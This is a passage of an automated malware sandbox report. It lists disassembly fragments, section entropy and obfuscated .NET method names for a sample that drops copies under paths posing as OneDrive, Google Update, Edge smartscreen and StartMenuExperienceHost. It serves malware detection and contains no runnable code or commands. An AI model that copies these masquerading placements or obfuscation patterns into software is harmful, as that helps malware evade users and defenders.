                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9BB23BAC pushfd ; retf 6_2_00007FFD9BB23BAE
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9BB23AE8 pushfd ; retf 6_2_00007FFD9BB23AE9
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9BB2606B push ebx; retf 0007h6_2_00007FFD9BB2610A
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9BB25FED push ebx; retn 0007h6_2_00007FFD9BB2604A
                              Source: C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exeCode function: 6_2_00007FFD9BB25F5D push ebx; retn 0007h6_2_00007FFD9BB2604A
                              Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exeCode function: 7_2_00007FFD9B7600BD pushad ; iretd 7_2_00007FFD9B7600C1
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 25_2_00007FFD9B7800BD pushad ; iretd 25_2_00007FFD9B7800C1
                              Source: C:\Users\user\Desktop\0JLWNg4Sz1.exeCode function: 26_2_00007FFD9B7900BD pushad ; iretd 26_2_00007FFD9B7900C1
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeCode function: 27_2_00007FFD9B7800BD pushad ; iretd 27_2_00007FFD9B7800C1
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeCode function: 27_2_00007FFD9B7A86E7 push ebp; ret 27_2_00007FFD9B7A86E8
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeCode function: 28_2_00007FFD9B7886E7 push ebp; ret 28_2_00007FFD9B7886E8
                              Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exeCode function: 28_2_00007FFD9B7600BD pushad ; iretd 28_2_00007FFD9B7600C1
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 29_2_00007FFD9B7886E7 push ebp; ret 29_2_00007FFD9B7886E8
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 29_2_00007FFD9B7600BD pushad ; iretd 29_2_00007FFD9B7600C1
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 30_2_00007FFD9B7700BD pushad ; iretd 30_2_00007FFD9B7700C1
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 30_2_00007FFD9B7986E7 push ebp; ret 30_2_00007FFD9B7986E8
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 31_2_00007FFD9B7986E7 push ebp; ret 31_2_00007FFD9B7986E8
                              Source: C:\Recovery\StartMenuExperienceHost.exeCode function: 31_2_00007FFD9B7700BD pushad ; iretd 31_2_00007FFD9B7700C1
                              Source: 0JLWNg4Sz1.exeStatic PE information: section name: .text entropy: 7.448087998754818
                              Source: DViaOgnvmAhwCXZ.exe.0.drStatic PE information: section name: .text entropy: 7.448087998754818
                              Source: DViaOgnvmAhwCXZ.exe0.0.drStatic PE information: section name: .text entropy: 7.448087998754818
                              Source: smartscreen.exe.0.drStatic PE information: section name: .text entropy: 7.448087998754818
                              Source: StartMenuExperienceHost.exe.0.drStatic PE information: section name: .text entropy: 7.448087998754818
                              Source: 0JLWNg4Sz1.exe, wvEIle89Wa78kQmtPO1.csHigh entropy of concatenated method names: 'EU885UEJAb', 'Wlh8xjW9tS', 'ela8Fknopr', 'plV534bcAIBGr3hTBX44', 'aGSdbabcIuTbZDWKIRfX', 'ndmwQEbcmIFKxpOPiRHp', 'IOlaDJbcP0eZns5wwCRr', 'LoD8l1YODX', 'xf48HB0x9k', 's868XVNmul'
                              Source: 0JLWNg4Sz1.exe, KaqhZtcES6ClRIhIKiH.csHigh entropy of concatenated method names: 'UPPcTqWKmP', 'k6r', 'ueK', 'QH3', 'phhcKpo6by', 'Flush', 'lMLckfD32P', 'vGqc5Igt0x', 'Write', 'LGCcxwr2NT'
                              Source: 0JLWNg4Sz1.exe, rnSCIo4SY356mOYg6xJ.csHigh entropy of concatenated method names: 'a8k4BMtQhS', 'vgNX6pbchLcATGJ8cmSy', 'n49HDdbc9UjjJT8iJPXN', 'KPUeBlbcrAff2AaPCifw', 'UJ6YODbcZdUL4sqWQbEX', 'VDcvH2bcjWgQJrOu30ZI', 'rN1YS3bclBoEK6yLY31j', 'nRu4JPFRRx', 'xww4UVXjZw', 'Uif4C2gyXb'
                              Source: 0JLWNg4Sz1.exe, M0P5Reg3OhBua3JFEbs.csHigh entropy of concatenated method names: 'xEFgsAMCL5', 'AMJgiaOmF7', 'pXxgOTeMJ5', 'qDfg15rna4', 'UYpgNdTZbk', 'yOlR7IbXRbwSbK4w5a5l', 'B8jDoZbX40aYgnnLWQcO', 'wHQSLebXQtnIKdZsNXAI', 'eDooxvbXeJRJ2LQjIt3f', 'GurnVpbX3hmsf4UQRUus'
                              Source: 0JLWNg4Sz1.exe, U3MAduneXottqUEf6bE.csHigh entropy of concatenated method names: 'f1vnpI4bgi', 'bTUnYysG3r', 'OmYnsLERrM', 'FJOniWQd54', 'MEynO6ZH1U', 'IZPn1mqmCW', 'RoSnNMVw8g', 'DSOnoo1e3L', 'oHmnWWk9gL', 'okCnSa8dsi'
                              Source: 0JLWNg4Sz1.exe, xA03rpSrrdcyjaXV34v.csHigh entropy of concatenated method names: 'i5CSXFceJY', 'QZlS0IUlCm', 'FegS2w4y0o', 'tpJi2Ebh8Lb8VCY3UJIG', 'oD4co4bh4SGI541pRuFa', 'RCJoQybhA4aLcr5xIs8m', 'aQ3x7AbhIcN2Rfemciv1', 's7qShi6fIC', 'UpgS9CYfZY', 'aS7SjUFouM'
                              Source: 0JLWNg4Sz1.exe, yJj1Fl7EmMa94jy6Uni.csHigh entropy of concatenated method names: 'Yh4kKMbG5Xh0PJ04F61W', 'vbL50QbGKmltjM9WhQug', 'qVbMZGbGkevO0jVGr3hx', 'nvI6JgbGx56YEmUwaAba', 'jpQ7TBvWBa', 'Mh9', 'method_0', 'ci87KNJSui', 'gFg7kphCwS', 'E0V755tEqC'
                              Source: 0JLWNg4Sz1.exe, K1KWTquHpDck1jMcI6Z.csHigh entropy of concatenated method names: 'TlIu0mlljG', 'Vdhu271Kp5', 'KLOuyMJfZx', 'DH1uEwnGMt', 'RcKuGThJvD', 'lDHv75byrFFrRNhUybrY', 'QxL5BVbyZ3WA8nNfCMEU', 'ljYtbybyfeJ4iU9qpq2j', 'dOSx0NbyMVLlNS1RT2dm', 'axUNCZbyhZkUrgpVbh0x'
                              Source: 0JLWNg4Sz1.exe, gsIJJF8tgc6Kt27dkwS.csHigh entropy of concatenated method names: 'fe68pWdh1r', 'gTsdoxbdZC2Fspgjcc4H', 'q7S5gYbdMCF999Rrt4q1', 'BmNvxEbdrSA3AlBfKXXa', 'JhttbKbdhYNJBLbu3sh4', 'CFiNx1bd9INowrYGSQFK', 'E94', 'P9X', 'vmethod_0', 'UHobALNJmxy'
                              Source: 0JLWNg4Sz1.exe, TQZFwlmIrZ94Ckj1ie0.csHigh entropy of concatenated method names: 'VTPm4CpBdl', 'PjfmQiHqWr', 'ypymRt8q1s', 'DV2megEWrI', 'MwWgyLbBOBVDhPTmhCIg', 'NRPgxZbBslb3MYS02OMM', 'TuB7BVbBin1VL70pVV8R', 'kPhXombB1G7TCmnRtoKx', 'LcG07pbBNRhcQKiOUESt', 'T2stNkbBoe9CtcjDe67C'
                              Source: 0JLWNg4Sz1.exe, Qs2EjnxoMOtvc9JmZIW.csHigh entropy of concatenated method names: 'zH8XtnbabSRQq9yG1Ljh', 'FKcJkhbamqmlJ65n4BNJ', 'L8vFKaRfXY', 'B6MjVfba81bWIgDFCTaM', 'OZ0hthba4LMTQoBKaPAy', 'MPsuxZbaQVmdjnfwA659', 'DiMmhnbaRQ4SFd7oj0gf', 'IDTRi0baesNdXtQ4Q7av', 'RqUlBGba3F948o5vfdau', 'OLdwE1baYiQXCH1fS66v'
                              Source: 0JLWNg4Sz1.exe, cqcxESRi8Qvb9t4Tgvw.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'iOsgLkbq7s2M10pD9cEN', 'IAH09WbqqXwkKxrRt3iu', 'my6kvMbqfoxlsbNm0tFp', 'NMI5LxbqMA9kyAQEdpZq'
                              Source: 0JLWNg4Sz1.exe, KxK9Qybvk5n8x4G07sb.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'z4ObQbBwwbR', 'PdlbAbXx1ob', 'tD77jFbwzeN2JvYn2qnu', 'LETqlmbB6Q9bSm4Q23pr', 'MCiQRfbBbTS73maCItFb', 'eEcCwYbBm7E3Uw8d9SjC'
                              Source: 0JLWNg4Sz1.exe, ooARSMLin5qekEb8tpe.csHigh entropy of concatenated method names: 'lRCLLihWHh', 'I37XdLbhXtHKHxgdSgKN', 'DhlOhUbhlnNmbnKZ6YIP', 'LileNqbhHjZEOWoGKVvB', 'CpjL1UpJMG', 'SpJGN6bhraGUjRngI4hK', 'Cy74SLbhf74jmJERBHcI', 'lOuduJbhMn8c3Qa3Mm6a', 'JwWjBpbhZve8ht3D4nHp', 'DVCtuobhh1LJqMIXV5Hv'
                              Source: 0JLWNg4Sz1.exe, Kn8eXxtlnhiK1oa4UCS.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'bKetXW5XQP', 'aivt0blEHP', 'Dispose', 'D31', 'wNK'
                              Source: 0JLWNg4Sz1.exe, i2aq4wrpD6Y5bc2DjVZ.csHigh entropy of concatenated method names: 'HHbrc6Vg50', 'A8ur7vvgAB', 'Borrq2KiBQ', 'MmfrfXyfBA', 'lDLrMEI4EN', 'K5Nrrv69oo', 'Ob7rZklL0A', 'dB6rhEo0pr', 'v1tr9dkh3S', 'xi6rj5invC'
                              Source: 0JLWNg4Sz1.exe, mRZXS6Dpm1rHtQeiq6i.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                              Source: 0JLWNg4Sz1.exe, TWhndcQNKwUpnrBVNCI.csHigh entropy of concatenated method names: 'nqDQLR3Iir', 'qZPUApb7cH4xadES5qE3', 'WGtysgb7p0ob25jCb8yE', 'GjFZFJb7dVvBIh71d4Ql', 'qRxgKUb77u6BJsMCcXlE', 'MBdQWKnmyl', 'AG4aSPb7ggOFlBX8dQcw', 'Y6bSL8b7wNSOltY0V0en', 'EqouQyb7BrNk66pg7uSK', 'POMyR5b7t03uUkH0GFJf'
                              Source: 0JLWNg4Sz1.exe, Ssmwo8pF64YjXD4m3sZ.csHigh entropy of concatenated method names: 'uhFpv3IPQx', 'G56pzDTgcR', 'D5Nd6bXk8h', 'owfdbYITc1', 'NZcdmvVBGf', 'XLwdPxsWxc', 'Rpx', 'method_4', 'f6W', 'uL1'
                              Source: 0JLWNg4Sz1.exe, P0wmQMnG47j70UOUgsZ.csHigh entropy of concatenated method names: 'smJnKOxiXC', 'rM0nkMUdS9', 'PMqn5fypff', 'hfgnxMfK1l', 'XJsnFaYyYJ', 'DG55vcbl2IKksSZlxpEt', 'ILPABsblyCYwUPPSPF8a', 'SXMcLtblEXI0hkWurl4h', 'gLZOKrblGOR9QBKVCTVl', 'o6UIIRblTOPbcirf7OGq'
                              Source: 0JLWNg4Sz1.exe, did8cBSBSiw9xBIYVAt.csHigh entropy of concatenated method names: 'NOUSfR9CN2', 'qKYBEgbZa5ppQxe84Xf1', 'rWtbTjbZxIE43ksx2ctx', 'eqobVNbZFwNbCreJ0f6W', 'JmkSuckgOj', 'WakSp13bV9', 'pJBSdfi0ho', 'JOoC4gbZKoLYTXAmDuER', 'qGQQPHbZkN2cPHLamCe5', 'WQppifbZGXxhLIF3kqLM'
                              Source: 0JLWNg4Sz1.exe, LcXJJV7Mfm5N28NO9Mo.csHigh entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'LqX7Z6iNRV', 'VFK7hKAgEb', 'xO2795WGyF', 'YYK7jcROxN', 'u8r7lfC4aH', 'mZm7Hi8afT', 'wlBAPBbG7r9GX1NIXHwS'
                              Source: 0JLWNg4Sz1.exe, uEMWelmp6xeXiI6VZSX.csHigh entropy of concatenated method names: 'opYm9omlr6', 'wVRmjbFyDD', 'RmdaF8bBhcM9m8G7uZq8', 'wSJ7KKbBrfLNQ8IAidry', 'TewlrZbBZg6i7nTwAPM3', 'rUx39ZbB9sTnnVM4qcg7', 'fMnm02VX4W', 'yiZvbNbBXmsygpwavyaM', 'AqVxsCbBldSMOauJh9oe', 'beM0XTbBHGoZsSWoFAfY'
                              Source: 0JLWNg4Sz1.exe, QsZr5IPgGuujSxCAeqQ.csHigh entropy of concatenated method names: 'mWvPjYR93r', 'zxFPlQ5Lvl', 'pD4PHEsZt6', 'gCdaShbDHEwC1jbpXCgE', 'NDHqnlbDXlqkIZtMbL6C', 'RIeb23bDjZm11leXu3Nb', 'VZ9L8CbDlUnZYGtHnj1s', 'iNDPB30Yd0', 'RiUPDdDPtt', 'BqdPuiF4gp'
                              Source: 0JLWNg4Sz1.exe, rgnIQeIlr9OZA9ElV1Y.csHigh entropy of concatenated method names: 'g2KIyS5KDe', 'RFjsR9bdm6S8r6FoL4TL', 'EqGvawbdP5ikb8IhIQ1y', 'kQtndobdArauXDaSIWIC', 'U1J', 'P9X', 'CB5bA1i5UGJ', 'FZhbANIkNWk', 'SwJbQ4NjuXr', 'imethod_0'
                              Source: 0JLWNg4Sz1.exe, F7oDlppQ7cuKQFlxLX5.csHigh entropy of concatenated method names: 'fsapeyyWcY', 'eS0p3j9heS', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'jK2pYyka8b', 'method_2', 'uc7'
                              Source: 0JLWNg4Sz1.exe, xXAvLnzYYgF1S8rWtx.csHigh entropy of concatenated method names: 'WcxbbZfouC', 'J4ZbPCAJuX', 'wJcbAFsaYk', 'DrDbIeBv0j', 'xh8b8qtP5A', 'Nncb4fK2Sl', 'cr7bRUUtq6', 'Dvg705bwRqd9oCw9J2mw', 'CiJmR4bwe9OWnE80EppE', 'JfwkoWbw3OPRu9Xq7UDa'
                              Source: 0JLWNg4Sz1.exe, I8ZhR9cq9dQNRp8jSrL.csHigh entropy of concatenated method names: 'Close', 'qL6', 'TjYcMv0lJX', 'EaHcrnvblD', 'k3xcZ3nKuy', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                              Source: 0JLWNg4Sz1.exe, v2VQvVbKRcWBkrETNK9.csHigh entropy of concatenated method names: 'P9X', 'gQLb5ImlGV', 'KZcbQ6Oa4nK', 'imethod_0', 'q28bxZP6Sg', 'Mw8gn8bw5TBfBOj3Smo1', 'dfmZ6AbwxMT5kjlaWJuR', 'vhIR8jbwKTgVpAe8N2r6', 'mwW3Z3bwkCu4XqZmqaj9', 'wqChU7bwFSU1lBP23VNF'
                              Source: 0JLWNg4Sz1.exe, yc3dPprHKSGAWfjjOTe.csHigh entropy of concatenated method names: 'wbkbQtq0Zln', 'qYWr0TUYwv', 'p4Ur244sfc', 'MKAryKx1B1', 'nBHLHObKo1IP6u7P30nk', 'ofbnuGbKWynTFpPkmGHP', 'CGFjagbKSvZ4hb27KuGE', 'cBJybqbKLCa1he8mRoPc', 'RSGiJ0bKJKlyxNVE43s1', 'WmJtkNbKUpB3pJPHIfCl'
                              Source: 0JLWNg4Sz1.exe, bO8JFAAd3ZAlHLFJ6eR.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'tSXbQAXSZJu', 'PdlbAbXx1ob', 'e6sJGjbuciQt6jHr8XSv', 'qejCx5bu7aeQ6djOkIty', 'Il2sC9buqwXH90lWp3FW', 'wtx1J6bufqjPZphTEDys', 'CyS4SQbuMMG0CQDfe79J'
                              Source: 0JLWNg4Sz1.exe, TjDulSuvXpZoRMMd7L9.csHigh entropy of concatenated method names: 'WwJp6w5kkN', 'cd8pbCBnOk', 'Yd7', 'O27pmE2Uuj', 'ngTpPtkfUh', 'R10pAZJDkF', 'BNRpIjphdT', 'BM893sbyyk0kMf6yn1Ch', 'KO05r2byEyLHQmwPQZ3a', 'lRopdbbyG3oTZ97Z9Veo'
                              Source: 0JLWNg4Sz1.exe, t56Qn6PEBQPJ6naQoFO.csHigh entropy of concatenated method names: 'IBjAPGcYj4', 'eBMAAiL7Yc', 'UPYAIRoCsl', 'fsIlknbuAEN1Iv4grxJA', 'VBWgtabuIRaqYVRTB3xt', 'kvmKO2bumdvjCUkU4lA2', 'EKyFJrbuPw9pPSo2HaM8', 'cxeA32qpxH', 'yiYvBJbuRdEO4ixi4GRa', 'Al6fgwbu4dLZvjVEjeTg'
                              Source: 0JLWNg4Sz1.exe, ybZP7aQIdKRh1BejQUR.csHigh entropy of concatenated method names: 'O3I', 'P9X', 'ntqbAVj4H6W', 'vmethod_0', 'imethod_0', 'BC2wg9b7si4qKnFT81Ci', 'gmsvAub7iMvgM86yxI5U', 'rgYeRsb73dKGPLQ7hQHU', 'UVbpOAb7YSJJFIi9PEmc', 'aac2qhb7OLZDUWmd39uC'
                              Source: 0JLWNg4Sz1.exe, hXM1RKoIXZXneRvfhe.csHigh entropy of concatenated method names: 'brn73YGNu', 'BIkbWMbgpC6rSR5mTi7q', 'LsYTB7bgdYvAivxMQfs7', 'tyEI03bgDKLEZJXrFG9r', 'KNUmnibguYm0I07DxPto', 'GuhSkja9H', 'qpaLEe9KI', 'jynJpgQaR', 'occUg5S9U', 'umCCtUjpI'
                              Source: 0JLWNg4Sz1.exe, jgOfPCIGSkBKDbnxjsT.csHigh entropy of concatenated method names: 'wa4IFfJWI1', 'WQbIaJ636q', 'x76IvtasX1', 'BraIz7xLoQ', 'gCI867VgWx', 'J208bC7dhV', 'gTJ8mn4lpf', 'pp5Yktbdin8p9NoaqcWY', 'AuFRrtbdO9baaMtwEY4k', 'Gv3D3tbdYgv51Vh2OoKa'
                              Source: 0JLWNg4Sz1.exe, IPNsrUgpsIdnQCbNZhO.csHigh entropy of concatenated method names: 'method_0', 'C0MgcpV4HG', 'UXQg75QB9o', 'g9pgqqdPv4', 'RAkgfhSD16', 'yxigMl4ZcY', 'o96grIpmLj', 'DogMUebXSvGrLMkpFpod', 'KqndnGbXo9KyHZ2JB2IR', 'tfppWjbXWj8yAd1WjiIk'
                              Source: 0JLWNg4Sz1.exe, zfYiH1AZnhdHb38sJ98.csHigh entropy of concatenated method names: 'kjHAarsX9A', 'c9MvWBbpApARR9RwuruN', 'gCogZtbpIuWuTIodVTBv', 'JAoaSlbpmKA0cEYvoitf', 'eG6OuxbpPRaO2YlfyGMJ', 'WUWYZGbpRmwPraRZ7Kgs', 'U4w44Rbp4xBqn6MiCeBW', 'wt2X5CbpQfCdT3f8tMkv', 'neeEwubpelBSa06Cg0vt', 'iUbI8NJsKR'
                              Source: 0JLWNg4Sz1.exe, ES5rquZpoZAAnv5Doa4.csHigh entropy of concatenated method names: 'RetZcuoBhd', 'iTbZ7QBfOg', 'u5UZqZ66Vt', 'H6dZf8dhO8', 's8PZM5BEXP', 'pbnZrTblBH', 'tbwZZQFKck', 'GCiZhUPpPu', 'sfAZ9y880s', 'KIFZj2MVkg'
                              Source: 0JLWNg4Sz1.exe, d3KjZrI7sthRG79BAKM.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'cpGbA3bjavR', 'reFIfIg0Ny', 'imethod_0', 'ERiND7bp9GjwrScPk6Ey', 'yjNEafbpjlror3jSFgWP', 'gbSSilbplbIYubsiNRAf', 'fcWy0nbpH0nevdPIKnqC'
                              Source: 0JLWNg4Sz1.exe, lLsTi2wPNhEUYZSa5Ic.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'NV6wIkRvdy', 'Write', 'NXow8SZX5h', 'nnEw4EyUhK', 'Flush', 'vl7'
                              Source: 0JLWNg4Sz1.exe, g0mC6MQXJrY7NdpcS30.csHigh entropy of concatenated method names: 'fcEQ5gpgqR', 'uIpxBZbqY9y4P5QKF8Wf', 'avvGW3bqeMegw6wYeToc', 'IjsviYbq3Bs5TwB7xEAu', 'myyiF6bqsCQ2nrNQSRB4', 'P9X', 'vmethod_0', 'ijvbAw8IGON', 'imethod_0', 'AmV1gAbq8dKosmZmMRZc'
                              Source: 0JLWNg4Sz1.exe, l0haC3QwJqAsbJN04UF.csHigh entropy of concatenated method names: 'mU8QDTlfVt', 'rBrQuinQST', 'iSlQpV2Pi4', 'kYDQdEbD9v', 'q0jQcs9Bfw', 'bBUQ7fFfo4', 'NILflGb7yxFatl0uJw1b', 'idBQdVb7ElqKJFSAlGWf', 'D8Iw91b7GH3hne2iEOoN', 'JEijpYb7TyNxaNy6FdCG'
                              Source: 0JLWNg4Sz1.exe, T9WJvy5siHytZdkYCSK.csHigh entropy of concatenated method names: 'MZu51uNABU', 'OKw5SZhVLb', 'CqT5UxMagu', 'h7y5C6nJSV', 'fJq5nOkbmD', 'lOs5tmt39x', 'x6o5VKPGu3', 'qbh5gxdiKX', 'Dispose', 'EyYoHjbFAkZKL6ulPk23'
                              Source: 0JLWNg4Sz1.exe, WwK3d2aiJO0tV2nA8Ro.csHigh entropy of concatenated method names: 'ST5mIdcdDJI', 'vicmIclHRnv', 'vGX9KgbauanjpLdC32rZ', 'KFMv7bbapSqRA9My4Slf', 'hkmhaAbadQtKHBHZxStr', 'pXagANbacQXxHv1kIP8a', 'oo5UV2ba7wky7M3VpV6O'
                              Source: 0JLWNg4Sz1.exe, G3ng6bmEg2NnX6OJK55.csHigh entropy of concatenated method names: 'NxNP4PPfvj', 'xHv7l1bDbBcCfWBNtomC', 'TRipZNbDm6G7BD9cxXGU', 'GriWZubDPOML7HWioRtr', 'eSi1tTbBznY7Y40mT104', 'XEoQaJbD6JWVg5tZ64hR', 'fDpARPbDA8wbvvW4Eu0R', 'XdoP6Qa0qd', 'n8EPm8MCUM', 'aYHPPiIvF7'
                              Source: 0JLWNg4Sz1.exe, m8bnl8L55T72dLEBlaQ.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'WsNLFDEmuI', 'JiKbQWrUSUl', 'QStgwcb9BorWT4x9LD2Z', 'a2Au9ab9gfEg6HOsejBl', 'Fc5BRUb9wM2Prmtuebp6', 'jiys1ab9DF4l9he9aUUm', 'UiI3P9b9uCABYybER9Nl'
                              Source: 0JLWNg4Sz1.exe, CKHAaTrRBZ3vc0rSSMd.csHigh entropy of concatenated method names: 'SmQrttcvO6', 'kKHh92bK8ofimpo11QFS', 'hs5KZrbK42eg8JBAkgKF', 'rxyYwfbKAHftg37aZGDd', 'hFLywGbKI5G7SXkp8wU9', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
                              Source: 0JLWNg4Sz1.exe, LYF8x3KMkw2ZP2d0YDG.csHigh entropy of concatenated method names: 'mwFbQgNbWkB', 'jwDb8VPpRny', 'bjXMv6bxPAWwZRdvtAJt', 'OMxNL9bxbIlUSHFrvP1h', 'rFBXOrbxmssuGVWs3bsQ', 'fwcHcSbxAMncMB2Ywd6x', 'zq3rRRbx87Zq6m7Co73r', 'x2DxKQbx4CU40RaFlSFy', 'CH2UgZbxQZPMcYpMPCnl', 'imethod_0'
                              Source: 0JLWNg4Sz1.exe, oC7amm4RQG8WfHWfygR.csHigh entropy of concatenated method names: 'JWw43GwoCR', 'CHf4YrF0px', 'Hg0gN1bcNEnQ3W1lSdOo', 'IU0yUebcOUjP80M1DIuN', 'fWyjXVbc1vmlakBJ8YgV', 'c53UkQbcoxxq7FWuLsBw', 'L4x5fPbcWxhiJnmR82Mh', 'gkUsNebcSXEYEiNbRxP8'
                              Source: 0JLWNg4Sz1.exe, QIE7HsKpvhlpcEmjKXN.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'rKoKckQBbU', 'Jj6fRlb5pFHtIa1r1uFV', 'bdAHTWb5daLLiqNX6iwu', 'aXheh2b5c9qAaqZXZide', 'tmVMUZb570ZXe1KqnMYk', 'tyN9wFb5q3LNeOARZWMo', 'Ru3Fglb5fu6KuDo6Qfiy'
                              Source: 0JLWNg4Sz1.exe, SF80mm87HsL0NUZ7oPJ.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'dLgbQeKQrgO', 'PdlbAbXx1ob', 'Nt6gG9bdlw7NYmEYjvd0', 'zvOFPKbdHkFrxx7lQERW', 'G3dBBIbdXls3UnxuyroQ'
                              Source: 0JLWNg4Sz1.exe, Ta5YhNfqBOqujlHd8a0.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Guq3TIbTUqCvNm3krE1A', 'dcTmCxbTLKeqLfjue5nc', 'h2ob4GbTJHqTFXeb2aLp'
                              Source: 0JLWNg4Sz1.exe, P6T7Tb49C9xOmYMOwCl.csHigh entropy of concatenated method names: 'PTu45Ge5f3', 'BRF4xcpPjq', 'zmaMibb7IobC1Zs1S0kV', 'PDYKykb78v27Sv6mmP4F', 'W9v4l3dtCn', 'wVH4H0CoFp', 'xsX4XBBmOX', 'uVx40Lbtms', 'MXd424P4eY', 'Tsh4yBw7PY'
                              Source: 0JLWNg4Sz1.exe, MRAl0GIZEPGAxLPqvt3.csHigh entropy of concatenated method names: 'q64', 'P9X', 'xJLbAipDaHa', 'vmethod_0', 'r9DbQ8MmIEi', 'imethod_0', 'rHixBZbpE5IhOfQWG1i6', 'yaQd3abpG2ONCGFhpDEQ', 'wdamVFbpTBYmL3Dnjngs', 'NgWQrPbpK2sIMtoSdxCa'
                              Source: 0JLWNg4Sz1.exe, L6R8fXmLAk8EvkGmlSM.csHigh entropy of concatenated method names: 'fjImUHWx5V', 'p0UmCewtKW', 'yVCXQXbBguAyY1KYNM6o', 'AcupoVbBwnDqPwPOJ8Ts', 'T3kbw2bBBfl8Wqp2L3Z3', 'HNM4DUbBDPDNkeqIR6CZ', 'YSESuPbBuByQ4o6slBhV', 'gqbBrfbBpnvLxp7wfLec'
                              Source: 0JLWNg4Sz1.exe, gZeU985hEAJd8mn80wu.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'IP25jdfn6I', 'uiQ5lIwcck', 'DMV5HmrywR', 'Dispose', 'OlG3U0bFLXWwncKJYAgC', 'TYPgaKbFJybhIBUh5lNr', 'CsTLBubFUhckEw2O3BAW', 'PYdbVXbFCaEDqpbrGU1C'
                              Source: 0JLWNg4Sz1.exe, QQwSq6Jbr3ePeqrlNbU.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'k63bQSHLPeA', 'cakbQL60Qoh', 'lOdoMRb9cQSBGTfr0MJp', 's5Ljmlb97mux0eoIpr4S', 'MTkA0sb9q0Ody7LCrk1l', 'PTQUPVb9fVyQNO31kjnB', 'X4lkGqb9Mn7t2xfkJkXi', 'TFW5fvb9r02cmYeeCdra'
                              Source: 0JLWNg4Sz1.exe, alltXiUsPRGraeial9Z.csHigh entropy of concatenated method names: 'o0DnbKIwvG', 'hd4Yg9blCsR2ZPSrHFyn', 'imZaknblJ6McB1sE9elE', 'NxbOyjblU8lDyHNiAZhD', 'o3UYdNbln6DN7JoLfxaV', 'C1BUOgYhtC', 'VYuU1mymoo', 'NhsUNCNa4i', 'TsTUomj5wW', 'VFOUWdOWAU'
                              Source: 0JLWNg4Sz1.exe, BiGMOUBTBON1cqgSoIM.csHigh entropy of concatenated method names: 'Ne8BkNeadc', 'ObmB5h1pum', 'utoBxThBaF', 'fCKBFkJ7PW', 'QfeBaGNXPg', 'OgrZ8Vb09MXidj876DMi', 'C5mEtlb0Zd5ymx41QMXe', 'RUCyrJb0hNcvQSq0exp9', 'mPeP0fb0jeqSE7IEiILK', 'YXXTn3b0lv8K7uPIPBJW'
                              Source: 0JLWNg4Sz1.exe, Qy7wX2SK0PUTXEoL22I.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'OZebQsAWCWN', 'BsZbAXZTe81', 'uB77IZbh1FoyMknNTPx2', 'eZKe13bhNPvf8h1V2Eue', 'eQQMSmbhop4YZAcBBlSn', 'PAKBc5bhW7yImVFPnCHE', 'xAGNYTbhSZni8N6ebC85'
                              Source: 0JLWNg4Sz1.exe, LM0kccAVQ5qbMJjpZFH.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'n2HbQPyjNdG', 'PdlbAbXx1ob', 'Q6UO4dbunHFvTWcnTkXL', 'lpaoawbutmCvYXEXWOZl', 'amJ92wbuV7dgNUA9PESA'
                              Source: 0JLWNg4Sz1.exe, u4Lt9yBv3ln6Ey5gaQr.csHigh entropy of concatenated method names: 'ecnD6Td8Gh', 'Lr2DbLWIlj', 'd6WDmDM16n', 'YQtDPc1qER', 'PJwDA0kQMW', 'Tj6DIxy2sL', 'mpJ1fXb02wKHjqVHkT0l', 'q8TBNib0yLU9Sf51mHvQ', 'XHfDNYb0EymHlV7vt7mJ', 'jEehVNb0GYDGJ0k9dLKw'
                              Source: 0JLWNg4Sz1.exe, FOoCLDOClwF6n8gRt6h.csHigh entropy of concatenated method names: 'dYZSsgNPP1', 'cAdSioTOy0', 'FbCYaWbZZBSRBpE3Cyrj', 'fLhVw9bZMKRb215d6aSe', 'd31iRLbZrRJkUAbiBQpw', 'xwFA9CbZhDoxEeHf7Zem', 'TIBINSbZ9Z6hdN0U8rky', 'f8GSSeSuPd', 'G4NIZ6bZl5tMNTsh7Lk1', 'IQrlCMbZHQkkhf8MEks9'
